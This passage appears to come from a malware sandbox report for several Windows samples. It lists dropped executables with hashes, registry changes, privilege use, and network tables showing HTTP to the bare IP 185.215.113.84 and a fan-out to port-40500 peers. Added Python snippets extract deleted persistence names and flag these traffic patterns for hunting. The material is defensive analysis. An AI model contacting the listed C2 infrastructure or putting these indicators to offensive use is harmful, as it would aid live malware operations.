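    index `start`, or None when the switch is absent or has no value."""
    try:
        idx = low.index(switch, start)
    except ValueError:
        return None
    return argv[idx + 1] if idx + 1 < len(argv) else None


def removed_persistence(cmdlines):
    """Map each deleted Run value / task name to the mechanisms it was removed from.
    The cmd.exe wrapper and its reg/schtasks child both appear in a sandbox process
    list; the set keeps them from counting twice."""
    removed = defaultdict(set)
    for cl in cmdlines:
        argv = win_argv(cl)
        low = [a.lower() for a in argv]
        for i, tok in enumerate(low):
            exe = tok.rsplit("\\", 1)[-1]
            if exe in ("reg", "reg.exe") and low[i + 1:i + 2] == ["delete"] and i + 2 < len(argv):
                # Only the Run key is handled here; RunOnce and HKLM variants
                # would need the same treatment.
                if low[i + 2].endswith("\\currentversion\\run"):
                    name = _after(argv, low, "/v", i + 3)
                    if name:
                        removed[name].add("run_key")
            elif exe in ("schtasks", "schtasks.exe") and "/delete" in low[i + 1:]:
                name = _after(argv, low, "/tn", i + 1)
                if name:
                    removed[name].add("scheduled_task")
    return {name: sorted(m) for name, m in removed.items()}


def hunt_names(removed, added):
    """Names deleted but not recreated: a prior variant's or a competitor's
    persistence, worth a fleet-wide search of Run keys and scheduled tasks."""
    return sorted(set(removed) - set(added))


if __name__ == "__main__":
    removed = removed_persistence(SAMPLE_CMDLINES)
    print(removed)
    print(hunt_names(removed, {"Windows Settings"}))
```

Run over EDR process-creation telemetry rather than a sandbox listing, the same extraction turns the cleanup commands into a list of Run value and task names to search for across the estate.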
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| SY | 46.53.24.15:40500 | | tcp |
| IR | 185.99.215.182:40500 | | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| YE | 134.35.146.76:40500 | | udp |
| BD | 103.54.150.88:40500 | | udp |
| IR | 151.245.143.102:40500 | | udp |
| PK | 113.197.50.97:40500 | | udp |
| SG | 146.70.67.37:40500 | | tcp |
| IR | 2.186.89.128:40500 | | udp |
| UZ | 217.30.173.134:40500 | | udp |
| RU | 176.214.156.53:40500 | | tcp |
| YE | 46.161.239.126:40500 | | udp |
| UZ | 80.80.222.89:40500 | | udp |
| BO | 190.129.1.154:40500 | | udp |
| AF | 180.94.82.94:40500 | | udp |
| UZ | 89.236.230.220:40500 | | udp |
| UZ | 213.230.127.141:40500 | | tcp |
| MX | 189.140.139.228:40500 | | udp |
| SD | 41.209.70.145:40500 | | udp |
| YE | 80.253.178.185:40500 | | udp |
| IR | 78.38.2.163:40500 | | udp |
| KZ | 2.134.107.231:40500 | | udp |
| UZ | 213.230.120.247:40500 | | tcp |
| UZ | 213.230.97.218:40500 | | udp |
| UZ | 213.230.127.60:40500 | | udp |
| IR | 5.238.107.4:40500 | | udp |
| UZ | 217.30.160.221:40500 | | udp |
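Two shapes stand out in the table above: repeated plain-HTTP connections to the bare IP 185.215.113.84:80 with no hostname behind them, and a burst of connections to port 40500 on more than twenty distinct hosts in a dozen countries, none of which was resolved through DNS, which is the shape of a peer list rather than of a hard-coded C2 URL. The following is an added example, not code from the report or the sandbox, that scores a network table in this layout for both patterns. The rows are a constructed subset of the table above and the thresholds (five peers, three countries) are this example's assumptions:

```python
"""Added example: flag peer-list fan-out and bare-IP HTTP in a sandbox
network table of the form '| Country | Destination | Domain | Proto |'.
Not the sandbox's own logic; rows below are a subset of this report's table."""
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: a subset of the rows from the table above.
SAMPLE_NET = """
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| SY | 46.53.24.15:40500 | | tcp |
| IR | 185.99.215.182:40500 | | udp |
| YE | 134.35.146.76:40500 | | udp |
| BD | 103.54.150.88:40500 | | udp |
| IR | 151.245.143.102:40500 | | udp |
| PK | 113.197.50.97:40500 | | udp |
| SG | 146.70.67.37:40500 | | tcp |
| UZ | 217.30.173.134:40500 | | udp |
"""


@dataclass(frozen=True)
class Conn:
    country: str
    ip: str
    port: int
    domain: str  # empty when the sandbox saw no DNS name for the destination
    proto: str


def parse_connections(text: str) -> list[Conn]:
    """Parse the four-column network table; an empty Domain cell is kept as ''."""
    conns = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|") or line.startswith("| Country"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4:
            continue
        country, dest, domain, proto = cells
        host, port = dest.rsplit(":", 1)
        conns.append(Conn(country, host, int(port), domain, proto))
    return conns


def port_fanout(conns, min_peers=5, min_countries=3):
    """Ports contacted on many distinct hosts in many countries with no DNS
    name behind any of them.  Thresholds are assumptions for this example."""
    by_port = defaultdict(list)
    for c in conns:
        by_port[c.port].append(c)
    out = {}
    for port, cs in by_port.items():
        peers = {c.ip for c in cs}
        countries = {c.country for c in cs}
        unresolved = all(c.domain in ("", c.ip) for c in cs)
        if len(peers) >= min_peers and len(countries) >= min_countries and unresolved:
            out[port] = {"peers": len(peers), "countries": len(countries),
                         "protos": sorted({c.proto for c in cs})}
    return out


def direct_ip_http(conns):
    """HTTP to a bare IP literal (Domain column equals the IP): no DNS to pivot on,
    so the IP itself is the indicator to block and search for."""
    return sorted({f"{c.ip}:{c.port}" for c in conns if c.port == 80 and c.domain == c.ip})


if __name__ == "__main__":
    conns = parse_connections(SAMPLE_NET)
    print(port_fanout(conns))
    print(direct_ip_http(conns))
```

The port-80 traffic to www.update.microsoft.com and the DNS query to 8.8.8.8 fall out of both checks, which is the point: the score rests on the absence of a resolved name and the spread of peers, not on any one address.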
Files
memory/1112-54-0x0000000074D61000-0x0000000074D63000-memory.dmp
C:\Windows\wklopsvcs.exe
| MD5 | 209baf40779b80d5e443c3dbbd656bfb |
| SHA1 | b64fa8dded031d5dacac519a2035cefcd05e6503 |
| SHA256 | c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d |
| SHA512 | 9b4e3e82e141e569c85f22dd215f804b2f4e8969cda858662efca67532ba57d2e0acdbaa179524b4996be62f9acee3298eaf6cdfd03eff7e39e23bc7163c440e |
memory/688-55-0x0000000000000000-mapping.dmp
C:\Windows\wklopsvcs.exe
| MD5 | 209baf40779b80d5e443c3dbbd656bfb |
| SHA1 | b64fa8dded031d5dacac519a2035cefcd05e6503 |
| SHA256 | c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d |
| SHA512 | 9b4e3e82e141e569c85f22dd215f804b2f4e8969cda858662efca67532ba57d2e0acdbaa179524b4996be62f9acee3298eaf6cdfd03eff7e39e23bc7163c440e |
\Users\Admin\AppData\Local\Temp\287145087.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1736-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\287145087.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\287145087.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1736-63-0x000000013FDC0000-0x000000013FDC6000-memory.dmp
memory/1736-64-0x000007FEFB801000-0x000007FEFB803000-memory.dmp
memory/1444-65-0x0000000000000000-mapping.dmp
memory/1968-66-0x0000000000000000-mapping.dmp
memory/588-67-0x0000000000000000-mapping.dmp
memory/1084-68-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\1349823367.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\1349823367.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/472-70-0x0000000000000000-mapping.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220901-en
Max time kernel
126s
Max time network
134s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{960EF201-3F0D-11ED-809F-FE8152C730B7} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{960C8101-3F0D-11ED-809F-FE8152C730B7} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371121285" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe
"C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe"
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:952 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:992 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.bing.com | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/1464-54-0x0000000075B51000-0x0000000075B53000-memory.dmp
\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/1528-57-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{960EF201-3F0D-11ED-809F-FE8152C730B7}.dat
| MD5 | f50f3192913eef549423b89180621a5a |
| SHA1 | aed9ea0e18f863329c10175cb7f24eca1c2ff9e9 |
| SHA256 | fee756cd93bca97007f04e4df730539fdff53a385aa8d6f2f49dd3a29152e803 |
| SHA512 | 27ed4d15566365527ec16adbb96ab59e340508c442c0b6224bacee5db5d768052759249c93456e23b200ee74b7f277ad975693b88514afc7e3f8d0e4ed57f2db |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{960C8101-3F0D-11ED-809F-FE8152C730B7}.dat
| MD5 | b8270fe68fbfcbde4acb9a9fbc2a874a |
| SHA1 | 21aea29a49bd0d3b1a0471c3218ac46725610047 |
| SHA256 | b3b4a6cc34a267a70a41b669acb17c20f03a12701a61f075809a485e0fc4fc0b |
| SHA512 | fe76351e72a7cfbcd244416bb315f0ac18a450c0e6aa573c75160b4dd58c411805d8de440f610aa64cd0edcd4c9507fe503ef0238762109d6d25ed134cd938ff |
memory/1464-61-0x0000000000140000-0x0000000000161000-memory.dmp
memory/1528-63-0x0000000000400000-0x000000000045D000-memory.dmp
memory/1464-62-0x0000000000400000-0x000000000045D000-memory.dmp
memory/1528-64-0x0000000000400000-0x000000000045D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\VS2F9PJN.txt
| MD5 | d2752fe1ba9ffde5596d84826382bbd1 |
| SHA1 | 9e63e4aa8b0c248df3ef0853ae38200325e891ce |
| SHA256 | 98f709a20931799c88e2fca9953369f44f5ae37c228a7d8aa276aaa55e07849a |
| SHA512 | 52022ac3d87d42730ac6c4197c61d4ed56491978c8b9ee0070901c476a5b0f5aedced0f7ecc9fe87075e80c98f5f6f58176d9c25aed248a82564019ca5f15de1 |
Analysis: behavioral7
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220901-en
Max time kernel
120s
Max time network
154s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0mgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3759265786b19c6b1196d620f48d8e1bd34d8f43268680065d545f34465f7ad0.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
